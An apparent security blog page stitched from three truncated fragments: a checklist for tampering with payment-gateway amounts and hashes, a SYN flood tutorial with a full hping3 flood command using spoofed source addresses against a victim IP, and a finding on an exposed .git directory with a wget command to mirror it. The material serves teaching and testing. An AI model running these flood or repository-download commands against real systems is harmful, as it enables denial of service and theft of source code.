CyberSecTech

  Threats Test Page Test Name An adversary can tamper with parameters in HTTP requests and responses to manipulate transactions Pages between Merchant and Payment Gateway page Tamper the amount value in request to Payment Gateway Change the amount as well as its generated hash value with lesser amount and its corresponding hash value. Change the quantity of the product to a higher value check if amount value is encoded or encrypted. If encoded, decode the amount, change it and encode it again or replace it with lower value encoded amount. Change the product (through product id or description) to a higher value product. Is hash/integrity verification done only on limited parameters? Any where in site Check if sensitive information is being disclosed in error page or source code. An adversary can manipulate transactions made through a payment gateway Pages before the payment gateway Change the amount that is to be paid before the request hits the payment gateway. Page/Request after the p

  Basic 3 way TCP Handshake: State during Sync flooding attack   Example of DDOS attack with hping3  and kali linux: Note:  In this case both attacker’s system and victim server are in same network . Step#1: Victim server: 192.168.1.100 Step#2: Attacker’s system: 192.168.1.102 Step#3: Install hping3 in kali using below command # sudo apt-get install hping3 Step#4: Now, attacker will use hping3 or another tool to spoof IP random addresses, The using below command start and direct the SYN flood attack to our target (192.168.1.100): # hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.100 Now SYN flooding attack has started. Let’s explain in detail the above command: -c 150000 : Indicates that we are sending 15000 packets -d 120 : Indicates each packet is of 120 bytes -S : Specifying SYN flag should be enabled. -w 64: Indicates TCP window size of 64 -p 80: Specifying port to attack victims webserver at port 80 --rand-source: Used to generate spoofed IP address

 (What's the main issue in the application?) The web server exposes a Source Code via version control system - Git. The Directory Listing feature that was enabled on the server side is discloses the directories that stores sensitive files that are related to the Source Code (Who can access? What are the possible risks) An external attacker may download the source code and disclose sensitive information regarding the development and possibly other sensitive data. In the application I found two ways of disclosing source code. Instance#1: After performing nikto I found directories as shown  An attacker may use automated tools to discover, download and extract git repositories. https://github.com/internetwache/GitTools Note: Due to the fact that the server has Directory Listing feature enabled, makes even easier to download the git repositories using simple wget command. wget --mirror -I .git TARGET.COM/.git/ Instance#2:  The attacker may run Directory Fuzzing attack and disclose direc